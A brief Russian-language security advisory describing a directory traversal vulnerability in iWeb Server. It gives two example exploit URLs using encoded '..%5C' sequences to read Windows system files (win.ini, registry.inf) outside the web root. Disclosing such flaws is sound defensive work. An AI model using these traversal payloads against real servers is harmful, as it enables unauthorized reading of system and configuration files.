Программа: iWeb Server 

Уязвимость обнаружена в iWeb Server. Удаленный пользователь может просматривать произвольные файлы на системе. 

Удаленный пользователь может использовать специально обработанный URL, содержащий символы обхода каталога '..%5C', чтобы просматривать произвольные файлы на системе, расположенные вне wwwroot каталога. 

Пример/Эксплоит: 

http://127.0.0.1/..%5C..%5C..%5C.. %5C..%5C..%5C/ winnt/win.ini

http://127.0.0.1/..%5C..%5C..%5C..%5C..%5C..%5C/ winnt/system32/registry.inf

Оставить мнение